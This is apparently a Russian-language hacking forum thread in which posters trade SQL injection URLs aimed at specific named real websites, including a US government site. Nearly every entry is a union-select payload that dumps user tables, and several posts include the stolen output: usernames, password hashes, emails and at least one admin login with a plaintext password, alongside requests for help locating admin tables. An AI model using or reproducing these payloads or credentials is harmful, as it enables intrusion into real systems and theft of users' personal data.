SQL Инъекции

Code:

http://www.microchip.by/info.php?id=99999+union+select+1,2,3,USER(),VERSION()/*

 

код:

http://well.com.ru/abc/article.phtml?id=-30+union+select+1,concat(email,char(58),username,char(58),password),3,4,5,6+from+users+limit+2969,1/*
[email protected]:andyman:4fb43774fffcebaa081b11f50f239245


код:

http://avd.org.ua/viewdetails.php?id=-915+union+select+1,concat_ws(0x3C62723E,username,passwd,email),3,4,5,6,7,8,9,10,11,12,13,14+from+user+limit+50,1/*
админка там-же, avdinform:123slayer

код:


http://scene.org.ru/forum.php?m_page=48&topic_id=-355+union+select+1,2,concat_ws(0x3C62723E,name,pwd,email),4+from+users+limit+2513,1/*
kama:
8beb1e67f180511e9ba1b1c8dd7338c6:
[email protected]

 

http://whl.ca/records/awards.php?id=65+limit+0+union+select+1,2,3,version(),5,1,2,3/*

 

Зачем такой изврат с лимитом, можна просто
http://whl.ca/records/awards.php?id=-1+union+select+1,2,3,versio n(),5,1,2,3/*

 

lovas.ru

Code:

http://lovas.ru/photo/?id=1660&fid=-1+union+select+1,2,3,4,5,concat_ws(0x3a,id,login,password)+from+lovas.kefir_users+where+id=1/*

девушки )

Code:

http://lovas.ru/photo/?id=1660&fid=-1+union+select+1,2,3,4,5,concat_ws(0x3a,id,login,password,icq,site,mail,phone)+from+lovas.kefir_users+where+gender=2+limit+350,200/*

 

VLG- Veterinary Leadership Group

Code:

http://www.vlg.us/users_info.php?user=-1+union+select+1,2,3,4,5,6,7,8,concat(adm_username,0x3a,adm_password),1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5+from+cms_admin+limit+0,1/*

csos:2d7784bc6d2ee4d098ba1a941b8aeff6
jackrife:8c7516e35cc1316c549d2e0a6be7c3f4

http://www.vlg.us/login.php

 

Продолжим список уязвимых сайтов наших отечественных групп:
http://www.piknik.info/ALBUMS/cd.php?id=-3+union+select+1,concat_ws(char(58),version(),database(),user()),3,4,5,6,7/*
4.0.27-max-log : piknik_omsa : [email protected]

 

http://www.ndt.net - PR 7

Code:

http://www.ndt.net/search/pdf2html.php?&url=-1'+union+select+1,2,3,4,5,concat_ws(0x3a,id,login,password,name,eMail,encrypted)+from+System+limit+4,630/*

Code:

http://www.ndt.net/search/pdf2html.php?&url=-1'+union+select+1,2,3,4,5,concat_ws(0x3a,id,username,passwort,author,eMail,WorkAs)+from+Profile+where+id=1/*+limit+1034,0/*

http://www.rgups.ru - РГУПС

Code:

http://www.ui.rgups.ru/full_new.php?id=-1+union+select+concat_ws(0x3a,login,pass),1,2+from+st_users+where+login=char(97,100,109,105,110)

 

_http://www.tebol.com.br/cidade/home.php?id=-1+union+select+1,user(),version(),database(),5,6,7,8,9,10,11/*
До полей не докопался... Очень нужны данные! Подскажите...

 

fRg,

Code:

http://www.tebol.com.br/cidade/home.php?id=-1+union+select+1,2,concat_ws(0x3a,table_name,column_name),database(),5,6,7%20,8,9,10,11+from+information_schema.columns+limit+775,1/*

Code:

http://www.tebol.com.br/cidade/home.php?id=-1+union+select+1,2,concat_ws(0x3a,table_name,column_name),database(),5,6,7%20,8,9,10,11+from+information_schema.columns+where+column_name=0x70617373776F7264/*limit+775,1/*

 

http://www.otpetyemoshenniki.ru/?sid=-1+union+select+1,concat_ws(0x3a,database(),user(),version()),3,4,5,6,7,8,9+from+information_schema.columns/*
чего то без прямого вывода...

 

Calcutta,

Code:

http://www.otpetyemoshenniki.ru/?sid=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,database(),user(),version())+from+information_schema.columns/* 

открываешь в html и делаешь поиск по "5.0.45-log"

 

Code:

http://www.kayakextrem.ru/olist.php?id_=-86+union+select+1,2,concat_ws(0x3C62723E,VERSION(),DATABASE(),USER()),4,5,6,7

Code:

http://www.obluvd.tsu.ru/inform.php?page=informfull&id_=-4+union+select+1,concat_ws(0x3C62723E,VERSION(),DATABASE(),USER())

 

=\

 

http://www.gs-agency.com/book_show_en.php?id=-1+union+select+1,2,3,4,5,6+from+table/*


плииз помогите подобрать таблицу админки

да и немного экзотикиЮ никто не может сказать что это за кодировка?
http://instyle-models.com/image.php?id=-1%20union%20select%20table_name,2222222+from+information_schema.tables/*
Штирлиц и тотал декодер сдались без боя

 

users

Code:

http://sydneyclubs.info/directory.php?cat=-1/**/UNION/**/ALL%20SELECT/**/1,2,3,4,5,6,7,concat(username,0x3a,password),9,10,11,12,13,14/**/FROM/**/users/*

users

Code:

http://www.pubsmontreal.com/directory.php?cat=-1/**/UNION/**/ALL%20SELECT/**/1,2,3,4,5,6,7,concat(username,0x3a,password),9,10,11,12,13,14/**/FROM/**/users/*

 

www.sei.aero

spacewor_jason@localhost:4.1.22-standard-log:spacewor_spaceworks

 

.gov

www5.hud.gov

Code:

http://www5.hud.gov/urban/perms/printReport.asp?report=-1))+or+1=@@version--
http://www5.hud.gov/urban/perms/printReport.asp?report=-1))+or+1=(select+user)--

 

.mobi

Code:

http://www.webmarket.[COLOR=Indigo]mobi[/COLOR]/wm.php?id=-1+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4,5,6/*

webmarke_uwebmar@localhost:5.0.41-community-log:webmarke_webmarket

Code:

http://www.webmarket.[COLOR=Indigo]mobi[/COLOR]/wm.php?id=-1+union+select+1,2,concat(column_name,0x3a,table_name,0x3a),4,5,6+from+INFORMATION_SCHEMA.COLUMNS+limit+16001/*

 

Code:

http://seagullmag.com/article.php?id=-1+union+select+1,0x6865617679206D6574616C21,concat_ws(0x3a,name,password),4,5,6,7,8,9,10,11+from+seagullmag_forum.ibf_members+limit+1,1
http://job.dn.ua/classifieds/detail.php?id=382&user_id=-1+union+select+version()&contact=1
http://job.dn.ua/classifieds/user_info.php?user_id=-1+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32
http://www.myminsk.com/catalog/info.php?id=-1+union+select+1,2,concat_ws(0x3a,table_schema,table_name),4,5,6,7,8,9,10,11,12,13,14+from+information_schema.tables